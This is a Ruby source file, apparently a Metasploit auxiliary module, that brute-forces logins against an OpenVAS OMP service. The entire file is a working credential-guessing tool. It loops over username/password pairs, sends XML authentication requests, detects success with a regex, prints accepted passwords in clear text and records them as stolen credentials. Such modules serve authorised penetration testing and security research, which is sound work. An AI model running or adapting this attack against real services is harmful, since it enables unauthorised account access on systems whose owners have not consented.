Path: blob/master/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
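##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that tries username/password pairs against an OpenVAS OMP
# service over TCP and records every pair the service accepts.
#
# Handling note: accepted passwords are printed in clear text by print_good and
# stored through report_cred, together with the raw server reply as proof.
# Console logs and the workspace database of a run therefore hold live
# credentials and should be protected accordingly.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Matches a status="200" attribute inside the <authenticate_response ...> tag
  # itself. [^>]* keeps the match within that one tag, so a status="200" that
  # belongs to a later element of the reply (the request also carries <HELP/>)
  # cannot be read as a successful login. Only the /i flag is used: in Ruby a
  # trailing /s selects the Windows-31J encoding, it is not Perl's "dot matches
  # newline", and a fixed-encoding pattern can raise on non-ASCII reply bytes.
  AUTH_SUCCESS = /<authenticate_response\b[^>]*\bstatus="200"/i

  # XML metacharacters and their entity replacements for element content.
  XML_ESCAPES = {
    '&' => '&amp;',
    '<' => '&lt;',
    '>' => '&gt;',
    '"' => '&quot;',
    "'" => '&apos;'
  }.freeze

  # Registers module metadata, the default port (9390) and BLANK_PASSWORDS.
  def initialize
    super(
      'Name' => 'OpenVAS OMP Login Utility',
      'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.',
      'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(9390),
        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
      ]
    )
  end

  # Runs the credential loop against one host.
  #
  # @param ip [String] address of the host being scanned (not read directly
  #   here; messages use rhost/rport through #msg)
  def run_host(ip)
    print_status("#{msg} Connecting and checking username and passwords")
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  rescue ::Rex::ConnectionError
    # Connection problems end the run for this host without a message.
    nil
  rescue ::StandardError => e
    # StandardError rather than Exception: Interrupt and SystemExit must
    # propagate so the operator can still stop a running scan.
    vprint_error("#{msg} #{e} #{e.backtrace}")
  end

  # Sends one request and stores the first reply chunk in @result.
  #
  # @param data [String, nil] bytes to send
  # @param con [Boolean] open a new connection before sending
  def omp_send(data = nil, con = true)
    @result = ''
    @coderesult = ''
    if con
      @connected = false
      connect
      # select with no descriptors is used as a 0.4 second pause after connect.
      select(nil, nil, nil, 0.4)
    end
    @connected = true
    sock.put(data)
    @result = sock.get_once
  rescue ::StandardError => e
    # Errors are reported, not raised; the caller sees whatever @result holds.
    print_error("#{msg} Error: #{e}")
  end

  # Stores an accepted credential pair for the service in the workspace.
  #
  # @param opts [Hash] reads :ip, :port, :service_name, :user, :password, :proof
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # The password is stored as given (private_type :password).
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Tries a single username/password pair.
  #
  # @param user [String, nil] username to try
  # @param pass [String, nil] password to try
  # @return [Symbol, nil] :next_user when the pair is accepted, :fail when it is
  #   not, nil when one of the rescued connection errors interrupts the attempt
  def do_login(user = nil, pass = nil)
    vprint_status("#{msg} Trying user:'#{user}' with password:'#{pass}'")
    # Credentials go in as escaped element content; a raw '&' or '<' would make
    # the request malformed and the pair would be reported as rejected without
    # ever having been evaluated by the service.
    cmd = "<authenticate><credentials><username>#{xml_escape(user)}</username>" \
          "<password>#{xml_escape(pass)}</password></credentials></authenticate><HELP/>\r\n"
    omp_send(cmd, true) # send hello

    # @result is nil when nothing was received, hence to_s.
    if @result.to_s.match?(AUTH_SUCCESS)
      print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")
      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'openvas-omp',
        user: user,
        password: pass,
        proof: @result
      )
      disconnect
      @connected = false
      return :next_user
    end

    if @connected
      disconnect # Sometimes OpenVAS disconnects the client after wrong attempts
      @connected = false
    end
    vprint_error("#{msg} Rejected user: '#{user}' with password: '#{pass}': #{@result}")
    :fail
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE
    # Connection-level failures are not a verdict on the credentials.
    nil
  end

  # Prefix used on every status line: "<host>:<port> OpenVAS OMP -".
  def msg
    "#{rhost}:#{rport} OpenVAS OMP -"
  end

  private

  # Escapes XML metacharacters so a value is sent as literal element content.
  #
  # @param value [#to_s] text to escape; nil becomes an empty string
  # @return [String] escaped copy
  def xml_escape(value)
    value.to_s.gsub(/[&<>"']/, XML_ESCAPES)
  end
end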